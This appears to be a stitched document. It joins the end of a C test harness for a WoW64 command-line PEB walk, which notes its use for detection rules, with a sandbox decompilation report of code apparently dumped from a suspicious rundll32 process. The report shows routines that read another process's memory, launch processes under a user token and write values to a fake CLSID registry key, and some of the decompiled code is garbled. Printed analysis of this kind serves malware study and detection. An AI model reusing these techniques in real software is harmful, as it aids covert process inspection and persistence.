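static size_t fake_read(void *ctx, uint64_t base, void *dst, size_t size) {
    const fake_space *s = ctx;
    for (size_t i = 0; i < s->n; i++) {
        const region *r = &s->r[i];
        if (base >= r->base && base - r->base < r->len) {
            size_t avail = r->len - (size_t)(base - r->base);
            size_t n = size < avail ? size : avail;
            memcpy(dst, r->data + (base - r->base), n);
            return n;                             /* short read when the region ends early */
        }
    }
    return 0;
}

static const uint64_t SAMPLE_PEB = 0x000000F2B8C4D000ULL, SAMPLE_UPP = 0x000001D5E6A01000ULL,
                      SAMPLE_CMD = 0x000001D5E6A02000ULL;

typedef struct {
    uint8_t pbi[PBI64_SIZE], peb[PEB64_READ_SIZE], upp[UPP64_READ_SIZE], cmd[256];
    fake_space space;
} sample_target;

void build_sample_target(sample_target *t, const char *ascii_cmdline) {
    size_t n = strlen(ascii_cmdline);
    memset(t, 0, sizeof *t);
    wr64le(t->pbi + PBI64_PEB_BASE, SAMPLE_PEB);
    wr64le(t->peb + PEB64_PROC_PARAMS, SAMPLE_UPP);
    for (size_t i = 0; i < n; i++) wr16le(t->cmd + 2 * i, (uint8_t)ascii_cmdline[i]);
    wr16le(t->upp + UPP64_CMDLINE_LEN, (uint16_t)(2 * n));
    wr16le(t->upp + UPP64_CMDLINE_LEN + 2, (uint16_t)(2 * n + 2));   /* MaximumLength */
    wr64le(t->upp + UPP64_CMDLINE_BUF, SAMPLE_CMD);
    t->space.r[0] = (region){ SAMPLE_PEB, t->peb, sizeof t->peb };
    t->space.r[1] = (region){ SAMPLE_UPP, t->upp, sizeof t->upp };
    t->space.r[2] = (region){ SAMPLE_CMD, t->cmd, 2 * n };
    t->space.n = 3;
}

int main(void) {
    sample_target t; wow64_walk w; uint16_t cmd[128];
    build_sample_target(&t, "notepad.exe C:\\tmp\\notes.txt");
    int rc = walk_cmdline64(fake_read, &t.space, t.pbi, &w, cmd, 128);
    printf("rc=%d peb=%#llx params=%#llx cmdline=", rc,
           (unsigned long long)w.peb_base, (unsigned long long)w.params_base);
    for (size_t i = 0; cmd[i]; i++) putchar(cmd[i] < 0x80 ? (int)cmd[i] : '?');
    putchar('\n');
    return rc;
}
```

For detection engineering the useful part is the fixed shape of the sequence: a 32-bit process resolving NtWow64QueryInformationProcess64 and NtWow64ReadVirtualMemory64 from ntdll and then issuing reads of exactly 0x388 and 0x3f8 bytes against another process is a narrow pattern for a cross-bitness PEB walk, and the example keeps those sizes as named constants so they can be lifted straight into a rule.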

                                                            C-Code - Quality: 25%
                                                            			E04635D7C(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a12) {
                                                            				signed int _v8;
                                                            				intOrPtr _v12;
                                                            				intOrPtr _v16;
                                                            				char _v32;
                                                            				intOrPtr _v72;
                                                            				intOrPtr _v76;
                                                            				char _v84;
                                                            				intOrPtr _v976;
                                                            				intOrPtr _v980;
                                                            				signed int _v988;
                                                            				char _v1100;
                                                            				intOrPtr _v1968;
                                                            				intOrPtr _v1972;
                                                            				char _v2004;
                                                            				intOrPtr _v2008;
                                                            				char _v2012;
                                                            				intOrPtr _v2016;
                                                            				signed int _t61;
                                                            				struct HINSTANCE__* _t63;
                                                            				struct HINSTANCE__* _t65;
                                                            				signed int _t86;
                                                            				intOrPtr* _t110;
                                                            				intOrPtr* _t114;
                                                            				intOrPtr _t133;
                                                            				intOrPtr* _t135;
                                                            				intOrPtr* _t140;
                                                            				intOrPtr _t143;
                                                            				void* _t144;
                                                            				signed int _t147;
                                                            				void* _t151;
                                                            				signed int _t152;
                                                            				intOrPtr _t175;
                                                            
                                                             				// The decompiler has merged two routines here: everything up to the int3 padding is
                                                             				// the tail of the previous function (E0465DE28 does not return; the padding follows it).
                                                             				_t114 = __ecx;
                                                             				L04655B81(_a12);
                                                             				_t152 = _t151 + 4;
                                                             				E0465DE28(0, 0);
                                                             				asm("int3");
                                                             				asm("int3");
                                                             				asm("int3");
                                                             				asm("int3");
                                                             				asm("int3");
                                                             				asm("int3");
                                                             				asm("int3");
                                                             				asm("int3");
                                                             				asm("int3");
                                                             				asm("int3");
                                                             				asm("int3");
                                                             				asm("int3");
                                                             				asm("int3");
                                                             				asm("int3");
                                                             				asm("int3");
                                                             				asm("int3");
                                                             				// Real entry point. From a 32-bit (WoW64) process: resolve NtWow64QueryInformationProcess64
                                                             				// and NtWow64ReadVirtualMemory64 from ntdll, query PROCESS_BASIC_INFORMATION64 (0x30 bytes)
                                                             				// for PebBaseAddress (+0x8), read 0x388 bytes of the 64-bit PEB, follow ProcessParameters
                                                             				// (+0x20), read 0x3f8 bytes of RTL_USER_PROCESS_PARAMETERS64 and copy CommandLine (Length
                                                             				// at +0x70, Buffer at +0x78) into the std::wstring-style object at __ecx (+0x10 size,
                                                             				// +0x14 capacity, 7-wchar inline buffer). __edx is the handle of the target process.
                                                             				_t147 = _t152;
                                                            				_t61 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t61 ^ _t147;
                                                            				_push(__esi);
                                                            				_v2016 = __edx;
                                                            				_t135 = _t114;
                                                            				_t63 = GetModuleHandleA("ntdll.dll");
                                                            				if(_t63 != 0) {
                                                            					L4:
                                                            					_t140 = GetProcAddress(_t63, "NtWow64QueryInformationProcess64");
                                                            				} else {
                                                            					_t63 = LoadLibraryA("ntdll.dll");
                                                            					if(_t63 != 0) {
                                                            						goto L4;
                                                            					} else {
                                                            						_t140 = 0;
                                                            					}
                                                            				}
                                                            				_t65 = GetModuleHandleA("ntdll.dll");
                                                            				if(_t65 != 0) {
                                                            					L8:
                                                            					_t110 = GetProcAddress(_t65, "NtWow64ReadVirtualMemory64");
                                                            				} else {
                                                            					_t65 = LoadLibraryA("ntdll.dll");
                                                            					if(_t65 != 0) {
                                                            						goto L8;
                                                            					} else {
                                                            						_t110 = 0;
                                                            					}
                                                            				}
                                                            				if(_t140 == 0 || _t110 == 0) {
                                                            					 *((intOrPtr*)(_t135 + 0x14)) = 7;
                                                            					 *((intOrPtr*)(_t135 + 0x10)) = 0;
                                                            					 *_t135 = 0;
                                                            					E046332A0(_t135, 0x467c5d0);
                                                            					__eflags = _v8 ^ _t147;
                                                            					return E04655AFE(_v8 ^ _t147, 0);
                                                            				} else {
                                                            					E0465DEA0(_t135,  &_v84, 0, 0x30);
                                                            					asm("xorps xmm0, xmm0");
                                                            					asm("movlpd [ebp-0x7d8], xmm0");
                                                            					_push( &_v2012);
                                                            					_push(0x30);
                                                            					_push( &_v84);
                                                            					_push(0);
                                                            					_push(_v2016);
                                                            					if( *_t140() < 0 || _v2012 != 0x30 || _v2008 != 0) {
                                                            						L25:
                                                            						E046331B0(_t135, _t135, 0x467c5d0);
                                                            						__eflags = _v8 ^ _t147;
                                                            						return E04655AFE(_v8 ^ _t147);
                                                            					} else {
                                                            						_t143 = _v2016;
                                                            						_push( &_v2012);
                                                            						_push(0);
                                                            						_push(0x388);
                                                            						_push( &_v2004);
                                                            						_push(_v72);
                                                            						_push(_v76);
                                                            						_push(_t143);
                                                            						if( *_t110() < 0 || _v2012 != 0x388 || _v2008 != 0) {
                                                            							goto L25;
                                                            						} else {
                                                            							_push( &_v2012);
                                                            							_push(0);
                                                            							_push(0x3f8);
                                                            							_push( &_v1100);
                                                            							_push(_v1968);
                                                            							_push(_v1972);
                                                            							_push(_t143);
                                                            							if( *_t110() < 0 || _v2012 != 0x3f8) {
                                                            								goto L25;
                                                            							} else {
                                                            								_t175 = _v2008;
                                                            								if(_t175 != 0) {
                                                            									goto L25;
                                                            								} else {
                                                            									_t86 = (_v988 & 0x0000ffff) + 1;
                                                            									_t144 = L04655B55( ~(_t175 > 0) | _t86 * 0x00000002, _t143, _t175);
                                                            									E0465DEA0(_t135, _t144, 0, 2 + (_v988 & 0x0000ffff) * 2);
                                                            									asm("cdq");
                                                            									 *_t110(_v2016, _v980, _v976, _t144, _v988 & 0x0000ffff, _t86 * 2 >> 0x20,  &_v2012,  ~(_t175 > 0) | _t86 * 0x00000002);
                                                            									E046331B0( &_v32, _t135, _t144);
                                                            									L04655B0F(_t144);
                                                            									 *((intOrPtr*)(_t135 + 0x14)) = 7;
                                                            									 *((intOrPtr*)(_t135 + 0x10)) = 0;
                                                            									 *_t135 = 0;
                                                            									_t133 = _v12;
                                                            									if(_t133 >= 8) {
                                                            										 *_t135 = _v32;
                                                            										_v32 = 0;
                                                            									} else {
                                                            										_t104 = _v16 + 1;
                                                            										if(_v16 + 1 != 0) {
                                                            											E0465D060(_t135,  &_v32, _t104 + _t104);
                                                            											_t133 = _v12;
                                                            										}
                                                            									}
                                                            									 *((intOrPtr*)(_t135 + 0x10)) = _v16;
                                                            									 *((intOrPtr*)(_t135 + 0x14)) = _t133;
                                                            									_v12 = 7;
                                                            									_v16 = 0;
                                                            									_v32 = 0;
                                                            									E04633170( &_v32);
                                                            									return E04655AFE(_v8 ^ _t147);
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 04635D8B
                                                              • Part of subcall function 0465DE28: RaiseException.KERNEL32(?,?,?,04656A2F,769C4560,00000000,?,?,?,?,?,?,04656A2F,04655B38,0468160C,04655B38), ref: 0465DE87
                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04635DC3
                                                            • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04635DD8
                                                            • GetProcAddress.KERNEL32(00000000,NtWow64QueryInformationProcess64), ref: 04635DE8
                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04635DF5
                                                            • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04635E04
                                                            • GetProcAddress.KERNEL32(00000000,NtWow64ReadVirtualMemory64), ref: 04635E14
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressHandleLibraryLoadModuleProc$ExceptionException@8RaiseThrow
                                                            • String ID: 0$ntdll.dll
                                                            • API String ID: 3650064235-1737626548
                                                            • Opcode ID: 5b99ee3e4ae63da359c3e7322b58e8e7e84aa451fb910da8f628b38dba9d4072
                                                            • Instruction ID: 64e15e5c903bdfa87f058a61b9e2ae92c7417107ef1d85bf5d66015b861128bb
                                                            • Opcode Fuzzy Hash: 5b99ee3e4ae63da359c3e7322b58e8e7e84aa451fb910da8f628b38dba9d4072
                                                            • Instruction Fuzzy Hash: EC51A971D04259BFEB619F60DD45BAEB3B8EF04305F4040AAE909A6180FB74BA84CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 92%
                                                            			E04645DD0(void* __ebx, short* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8) {
                                                            				signed int _v8;
                                                            				short _v528;
                                                            				void* _v532;
                                                            				int _v536;
                                                            				short* _v540;
                                                            				void* _v544;
                                                            				int _v548;
                                                            				int _v552;
                                                            				intOrPtr _v556;
                                                            				intOrPtr _v560;
                                                            				signed int _t45;
                                                            				intOrPtr _t47;
                                                            				intOrPtr _t48;
                                                            				intOrPtr _t49;
                                                            				short _t50;
                                                            				int _t54;
                                                            				signed int _t81;
                                                            				signed int _t82;
                                                            				signed int _t83;
                                                            				signed int _t88;
                                                            				short* _t89;
                                                            				signed int _t90;
                                                            				signed int _t91;
                                                            				signed short* _t94;
                                                            				signed short* _t95;
                                                            				signed short* _t96;
                                                            				short* _t98;
                                                            				void* _t100;
                                                            				void* _t102;
                                                            				intOrPtr* _t104;
                                                            				void* _t105;
                                                            				intOrPtr* _t107;
                                                            				void* _t108;
                                                            				signed int _t109;
                                                            				void* _t110;
                                                            				void* _t111;
                                                            				void* _t113;
                                                            				void* _t114;
                                                            
                                                            				_t89 = __ecx;
                                                            				_t45 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t45 ^ _t109;
                                                            				_t47 =  *0x467e690; // 0x2a
                                                            				_t107 = _a4;
                                                            				_t104 = _a8;
                                                            				 *((intOrPtr*)(__edx)) = _t47;
                                                            				_t48 =  *0x467e690; // 0x2a
                                                            				_v556 = __edx;
                                                            				_t98 =  &(__ecx[1]);
                                                            				 *_t104 = _t48;
                                                            				_t49 =  *0x467e690; // 0x2a
                                                            				_v540 = __ecx;
                                                            				_v560 = _t104;
                                                            				 *_t107 = _t49;
                                                            				do {
                                                            					_t50 =  *_t89;
                                                            					_t89 =  &(_t89[1]);
                                                            				} while (_t50 != 0);
                                                            				_t90 = _t89 - _t98;
                                                            				_t91 = _t90 >> 1;
                                                            				if(_t90 != 0) {
                                                            					_t54 = GetFileVersionInfoSizeW(_v540,  &_v552);
                                                            					_v548 = _t54;
                                                            					_t118 = _t54;
                                                            					if(_t54 != 0) {
                                                            						_push(_t54);
                                                            						_t105 = L04655B55(_t91, _t107, _t118);
                                                            						_t111 = _t110 + 4;
                                                            						if(_t105 != 0) {
                                                            							if(GetFileVersionInfoW(_v540, _v552, _v548, _t105) != 0 && VerQueryValueW(_t105, L"\\VarFileInfo\\Translation",  &_v544,  &_v536) != 0) {
                                                            								_t88 = ( *_v544 & 0x0000ffff) << 0x00000010 |  *(_v544 + 2) & 0x0000ffff;
                                                            								wsprintfW( &_v528, L"\\StringFileInfo\\%08lx\\FileDescription", _t88);
                                                            								_t113 = _t111 + 0xc;
                                                            								if(VerQueryValueW(_t105,  &_v528,  &_v532,  &_v536) != 0) {
                                                            									_t96 = _v532;
                                                            									_t102 = _v556 - _t96;
                                                            									do {
                                                            										_t83 =  *_t96 & 0x0000ffff;
                                                            										_t96 =  &(_t96[1]);
                                                            										 *(_t102 + _t96 - 2) = _t83;
                                                            									} while (_t83 != 0);
                                                            								}
                                                            								wsprintfW( &_v528, L"\\StringFileInfo\\%08lx\\CompanyName", _t88);
                                                            								_t114 = _t113 + 0xc;
                                                            								if(VerQueryValueW(_t105,  &_v528,  &_v532,  &_v536) != 0) {
                                                            									_t95 = _v532;
                                                            									_t100 = _v560 - _t95;
                                                            									asm("o16 nop [eax+eax]");
                                                            									do {
                                                            										_t82 =  *_t95 & 0x0000ffff;
                                                            										_t95 =  &(_t95[1]);
                                                            										 *(_t100 + _t95 - 2) = _t82;
                                                            									} while (_t82 != 0);
                                                            								}
                                                            								wsprintfW( &_v528, L"\\StringFileInfo\\%08lx\\ProductVersion", _t88);
                                                            								_t111 = _t114 + 0xc;
                                                            								if(VerQueryValueW(_t105,  &_v528,  &_v532,  &_v536) != 0) {
                                                            									_t94 = _v532;
                                                            									_t108 = _t107 - _t94;
                                                            									do {
                                                            										_t81 =  *_t94 & 0x0000ffff;
                                                            										_t94 =  &(_t94[1]);
                                                            										 *(_t108 + _t94 - 2) = _t81;
                                                            									} while (_t81 != 0);
                                                            								}
                                                            							}
                                                            							L04655B0F(_t105);
                                                            						}
                                                            					}
                                                            				}
                                                            				return E04655AFE(_v8 ^ _t109);
                                                            			}

                                                            APIs
                                                            Strings
                                                            • \VarFileInfo\Translation, xrefs: 04645E98
                                                            • \StringFileInfo\%08lx\CompanyName, xrefs: 04645F19
                                                            • \StringFileInfo\%08lx\FileDescription, xrefs: 04645EC5
                                                            • \StringFileInfo\%08lx\ProductVersion, xrefs: 04645F77
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: wsprintf
                                                            • String ID: \StringFileInfo\%08lx\CompanyName$\StringFileInfo\%08lx\FileDescription$\StringFileInfo\%08lx\ProductVersion$\VarFileInfo\Translation
                                                            • API String ID: 2111968516-2104189134
                                                            • Opcode ID: 71b16a20fcedc23c822aed5944a96e249de33e76bc2f9ca31a19967433b060a9
                                                            • Instruction ID: 27c69e597404e014d88970bac92e3b969cbbea7a4d0b9188ab589361e2f91ebe
                                                            • Opcode Fuzzy Hash: 71b16a20fcedc23c822aed5944a96e249de33e76bc2f9ca31a19967433b060a9
                                                            • Instruction Fuzzy Hash: C3517175540219ABCB15DFA4DC88AEAB7B8FF54304F1441EAE909D7240FB35AE85CF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 53%
                                                            			E046472E0(void* __ebx, intOrPtr __edx, void* __eflags, WCHAR* _a8, struct _PROCESS_INFORMATION* _a20) {
                                                            				void* _v8;
                                                            				void* _v12;
                                                            				struct _STARTUPINFOW _v80;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				struct HINSTANCE__* _t26;
                                                            				_Unknown_base(*)()* _t27;
                                                            				void* _t29;
                                                            				void* _t34;
                                                            				long _t36;
                                                            				intOrPtr _t37;
                                                            				void* _t38;
                                                            
                                                            				_t36 = 0;
                                                            				_t37 = __edx;
                                                            				E0465DEA0(0,  &(_v80.lpReserved), 0, 0x40);
                                                            				_v80.cb = 0x44;
                                                            				_v80.lpDesktop = _t37;
                                                            				_v8 = 0;
                                                            				if(L0464ABF0() != 2) {
                                                            					return CreateProcessW(0, _a8, 0, 0, 0, 0, 0, 0,  &_v80, _a20);
                                                            				} else {
                                                            					_t38 = E046470E0(__ebx, 0, _t37);
                                                            					if(_t38 != 0) {
                                                            						_v12 = 0;
                                                            						_t26 = LoadLibraryA("Wtsapi32.dll");
                                                            						if(_t26 != 0) {
                                                            							_t27 = GetProcAddress(_t26, "WTSQueryUserToken");
                                                            							if(_t27 != 0) {
                                                            								_push( &_v12);
                                                            								_push(_t38);
                                                            								if( *_t27() != 0) {
                                                            									_t29 =  &_v8;
                                                            									__imp__CreateEnvironmentBlock(_t29, _v12, 0);
                                                            									if(_t29 != 0) {
                                                            										_t29 = _v8;
                                                            										_t36 = 0x400;
                                                            									} else {
                                                            										_v8 = _t29;
                                                            									}
                                                            									CreateProcessAsUserW(_v12, 0, _a8, 0, 0, 0, _t36, _t29, 0,  &_v80, _a20);
                                                            									_t34 = _v8;
                                                            									if(_t34 != 0) {
                                                            										__imp__DestroyEnvironmentBlock(_t34);
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					return 0;
                                                            				}
                                                            			}















                                                            Line addresses: 0x046472ea, 0x046472f1, 0x046472f3, 0x046472fb, 0x04647302, 0x04647305, 0x04647310, 0x046473c5, 0x04647316, 0x0464731b, 0x0464731f, 0x04647326, 0x04647329, 0x04647331, 0x04647339, 0x04647341, 0x04647346, 0x04647347, 0x0464734c, 0x04647352, 0x04647356, 0x0464735e, 0x04647365, 0x04647368, 0x04647360, 0x04647360, 0x04647360, 0x04647386, 0x0464738c, 0x04647391, 0x04647394, 0x04647394, 0x04647391, 0x0464734c, 0x04647341, 0x04647331, 0x046473a1, 0x046473a1

                                                            APIs
                                                              • Part of subcall function 0464ABF0: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0464AC2E
                                                              • Part of subcall function 0464ABF0: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0464AC41
                                                              • Part of subcall function 0464ABF0: FreeSid.ADVAPI32(?), ref: 0464AC4A
                                                            • CreateProcessW.KERNEL32(00000000,04636938,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 046473BA
                                                              • Part of subcall function 046470E0: GetVersionExW.KERNEL32(00000114,?,00000104,00000000), ref: 0464711D
                                                              • Part of subcall function 046470E0: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,00000104,00000000), ref: 04647135
                                                            • LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 04647329
                                                            • GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04647339
                                                            • CreateProcessAsUserW.ADVAPI32(?,00000000,04636938,00000000,00000000,00000000,00000400,?,00000000,00000044,?), ref: 04647386
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateLibraryLoadProcess$AddressAllocateCheckFreeInitializeMembershipProcTokenUserVersion
                                                            • String ID: D$WTSQueryUserToken$Wtsapi32.dll
                                                            • API String ID: 903725173-1631787044
                                                            • Opcode ID: 817f3789bb8c758b0d7adf15922d3e84fabf7a8e5ae7ecc28eb57bfe9a9e7b2b
                                                            • Instruction ID: 243e4adf8e15fb67bcbc93cddc80553d579c55c7d362cd6f01d9ce3df5487fdc
                                                            • Opcode Fuzzy Hash: 817f3789bb8c758b0d7adf15922d3e84fabf7a8e5ae7ecc28eb57bfe9a9e7b2b
                                                            • Instruction Fuzzy Hash: 8B21B571A40209FBEF219FA1DC09FAE7B78EB94B11F100069F908E6240FB30A901CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 95%
                                                            			E04646DF0(intOrPtr* __ecx, char __edx) {
                                                            				void* _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				void* _t17;
                                                            				long _t18;
                                                            				char _t25;
                                                            				void* _t30;
                                                            				char* _t31;
                                                            				char* _t35;
                                                            				char* _t36;
                                                            				intOrPtr* _t40;
                                                            
                                                            				_t36 = __ecx;
                                                            				_v12 = __edx;
                                                            				if(__ecx == 0) {
                                                            					return _t17;
                                                            				}
                                                            				_t40 = __ecx;
                                                            				_t30 = __ecx + 2;
                                                            				asm("o16 nop [eax+eax]");
                                                            				do {
                                                            					_t18 =  *_t40;
                                                            					_t40 = _t40 + 2;
                                                            				} while (_t18 != 0);
                                                            				if(_t40 - _t30 >> 1 < 1) {
                                                            					L11:
                                                            					return _t18;
                                                            				}
                                                            				_v8 = 0;
                                                            				if(RegCreateKeyExW(0x80000002, L"SOFTWARE\\Classes\\CLSID\\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}", 0, 0, 0, 0xf013f, 0,  &_v8, 0) != 0) {
                                                            					L9:
                                                            					_v16 = _v12;
                                                            					_v8 = 0;
                                                            					_t18 = RegCreateKeyExW(0x80000002, L"SOFTWARE\\Classes\\CLSID\\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}", 0, 0, 0, 0xf013f, 0,  &_v8, 0);
                                                            					if(_t18 == 0) {
                                                            						RegSetValueExW(_v8, "2", 0, 4,  &_v16, 4);
                                                            						_t18 = RegCloseKey(_v8);
                                                            					}
                                                            					goto L11;
                                                            				}
                                                            				_t31 = _t36;
                                                            				_t35 =  &(_t31[2]);
                                                            				do {
                                                            					_t25 =  *_t31;
                                                            					_t31 =  &(_t31[2]);
                                                            				} while (_t25 != 0);
                                                            				RegSetValueExW(_v8, "1", 0, 1, _t36, 2 + (_t31 - _t35 >> 1) * 2);
                                                            				RegCloseKey(_v8);
                                                            				goto L9;
                                                            			}














                                                            Line addresses: 0x04646df7, 0x04646df9, 0x04646dfe, 0x04646eef, 0x04646eef, 0x04646e05, 0x04646e07, 0x04646e0a, 0x04646e10, 0x04646e10, 0x04646e13, 0x04646e16, 0x04646e22, 0x04646eea, 0x00000000, 0x04646eea, 0x04646e4b, 0x04646e56, 0x04646e9d, 0x04646ea2, 0x04646ec0, 0x04646ec7, 0x04646ecb, 0x04646edf, 0x04646ee8, 0x04646ee8, 0x00000000, 0x04646ecb, 0x04646e58, 0x04646e5a, 0x04646e60, 0x04646e60, 0x04646e63, 0x04646e66, 0x04646e84, 0x04646e93, 0x00000000

                                                            APIs
                                                            • RegCreateKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC},00000000,00000000,00000000,000F013F,00000000,0464C359,00000000,00000000,00000000), ref: 04646E52
                                                            • RegSetValueExW.ADVAPI32(00000000,0467E09C,00000000,00000001,?,00000000), ref: 04646E84
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 04646E93
                                                            • RegCreateKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC},00000000,00000000,00000000,000F013F,00000000,00000000,00000000), ref: 04646EC7
                                                            • RegSetValueExW.ADVAPI32(00000000,0467E124,00000000,00000004,?,00000004), ref: 04646EDF
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 04646EE8
                                                            Strings
                                                            • SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}, xrefs: 04646E41, 04646EB6
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseCreateValue
                                                            • String ID: SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}
                                                            • API String ID: 1818849710-2030040551
                                                            • Opcode ID: 13064f6a7157ac8cf672da0a58e15786e3bb9d93b208ec2b86d8a5830c05c109
                                                            • Instruction ID: 42a66d627b69b17b098087df7427cc1684f03daf1e82748871b8f119fd8b619f
                                                            • Opcode Fuzzy Hash: 13064f6a7157ac8cf672da0a58e15786e3bb9d93b208ec2b86d8a5830c05c109
                                                            • Instruction Fuzzy Hash: CB21B175A44208FBEF249B94DC06FADB7B8EB85B00F200159FA057B290E7B57A01DB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 82%
                                                            			E0463A980(void* __ebx, void* __ecx, void* __eflags, char* _a4, int _a8) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				void* _v612;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				signed int _t23;
                                                            				int _t31;
                                                            				struct _CRITICAL_SECTION* _t39;
                                                            				char* _t45;
                                                            				void* _t56;
                                                            				int _t58;
                                                            				void* _t61;
                                                            				void* _t64;
                                                            				signed int _t71;
                                                            
                                                            				_t69 = _t71;
                                                            				_t23 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t23 ^ _t71;
                                                            				_t45 = _a4;
                                                            				_push(_t61);
                                                            				_t56 = __ecx;
                                                            				E04646050(_t45, L"Global",  &_v88, __ecx, _t61);
                                                            				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				_v612 = 0;
                                                            				_t31 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0);
                                                            				if(_t31 != 0) {
                                                            					L2:
                                                            					return E04655AFE(_v8 ^ _t69);
                                                            				} else {
                                                            					RegSetValueExW(_v612, "1", _t31, 3, _t45, _a8);
                                                            					_t64 =  ==  ? 1 : 0;
                                                            					RegCloseKey(_v612);
                                                            					if(_t64 != 0) {
                                                            						CreateEventA(0, 1, 0, _t56 + 0xc);
                                                            						E0465F4A8(0);
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						_push(_t56);
                                                            						_t58 = 1;
                                                            						 *1 = 0x467df78;
                                                            						if( *0x00000025 == 0) {
                                                            							L10:
                                                            							_t39 = _t58 + 0x28;
                                                            							DeleteCriticalSection(_t39);
                                                            							return _t39;
                                                            						} else {
                                                            							_push(_t64);
                                                            							EnterCriticalSection(0x29);
                                                            							if( *0x00000025 != 0) {
                                                            								_t52 =  *0x00000041;
                                                            								 *0x00000025 = 0;
                                                            								if( *0x00000041 != 0) {
                                                            									E0464FE10(_t52, 0x29);
                                                            									 *0x00000041 = 0;
                                                            								}
                                                            								LeaveCriticalSection(0x29);
                                                            								 *((intOrPtr*)( *_t58 + 4))();
                                                            								goto L10;
                                                            							} else {
                                                            								LeaveCriticalSection(0x29);
                                                            								DeleteCriticalSection(0x29);
                                                            								return 0x29;
                                                            							}
                                                            						}
                                                            					} else {
                                                            						goto L2;
                                                            					}
                                                            				}
                                                            			}


















                                                            Line addresses: 0x0463a981, 0x0463a989, 0x0463a990, 0x0463a994, 0x0463a99a, 0x0463a99c, 0x0463a9a3, 0x0463a9b8, 0x0463a9c9, 0x0463a9e6, 0x0463a9ee, 0x0463aa22, 0x0463aa34, 0x0463a9f0, 0x0463aa02, 0x0463aa15, 0x0463aa18, 0x0463aa20, 0x0463aa41, 0x0463aa49, 0x0463aa4e, 0x0463aa4f, 0x0463aa50, 0x0463aa51, 0x0463aa57, 0x0463aa5d, 0x0463aaad, 0x0463aaad, 0x0463aab1, 0x0463aab8, 0x0463aa5f, 0x0463aa5f, 0x0463aa64, 0x0463aa6e, 0x0463aa84, 0x0463aa87, 0x0463aa90, 0x0463aa92, 0x0463aa97, 0x0463aa97, 0x0463aa9f, 0x0463aaa9, 0x00000000, 0x0463aa70, 0x0463aa71, 0x0463aa7c, 0x0463aa83, 0x0463aa83, 0x0463aa6e, 0x00000000, 0x00000000, 0x00000000, 0x0463aa20

                                                            APIs
